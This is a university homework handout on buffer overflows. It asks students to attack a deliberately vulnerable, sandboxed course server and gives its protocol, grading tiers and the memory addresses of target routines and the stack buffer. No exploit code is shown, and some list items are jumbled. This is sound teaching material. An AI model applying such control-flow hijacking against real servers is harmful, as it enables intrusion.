HW2: Buffer Overflow by Example
CS 493/693 Homework,
Dr. Lawlor, 2006/02/06. Due at 5pm on Monday, Feb 13 (Monday the 13th!).
I've started a vulnerable network server process, listening on port 80
of the server "target.cs.uaf.edu". Your assignment is to see
firsthand how a buffer
overflow attack works, by attacking this port of this server.
Allow me to be very clear. DO NOT ATTACK ANY OTHER PORT OR MACHINE.
The server listening on port 80 of target.cs.uaf.edu is NOT a
webserver. Instead, it speaks the following very simple protocol:
The grade levels available for this assignment are:
- The server sends you a welcome string followed by a newline.
- You send the server your UAF email ID (like "ffosl") followed by a newline.
- You send the server an arbitrary attack buffer, followed by a newline.
- The server then executes the following laughably insecure code on your attack buffer "req":
- The server records and sends back your grade and a short explanation, followed by a newline.
I'll keep your highest grade--you can repeatedly attack the server
as many times as you like. Please do not denial-of-service
the target, or try to break out of the emulated machine.
- F (5 points for 493, 2 points for 693): for giving your
email ID and a non-dangerous string. (Note: "F" is still more points
than a "0".)
- D (6 points, 4 points for 693): for crashing the server with a
segfault, illegal instruction, or hang. (Don't worry--it'll immediately
- C (7 points, 6 points for 693): for calling the "grade_C" routine.
- B (9 points, 8 points for 693): for calling the "grade" routine, and passing in the "grade_B" string.
- A (10 points): for calling the "grade" routine with your own string that starts with "A".
You should be able to get at least a "D" using just "telnet" run
interactively. For higher grade levels, writing your own network
attacker program is recommended. If you log in and send two strings-and-newlines
without immediately getting a one-line grade back, send me an
email--the target may have gone down.
The vulnerable server has this source code,
which you'll pretty much have to read. You could even compile and run
the server, although be careful not to get hacked yourself! The
relevant buffer locations as actually run (hint, hint!) are:
Inside vulnerable routine:
This vulnerable server runs:
grade_C routine is at 0x8048d68
grade_B string is at 0x8082357
grade routine is at 0x8048cb4
buf is at 0xbfffff28
So don't worry about breaking anything too important--and have
fun! You don't need to turn anything in--I can get your grade out
of the server logs!
- After a step of logging and filtering on the target front
end. This also redirects the attacking port from port 80 on
target.cs.uaf.edu to port 1235 on the emulated machine.
- As a "nobody" user, inside a "chroot" jail, inside a QEMU virtual machine, run as a "nobody" user, on the
worthless machine target.cs.uaf.edu.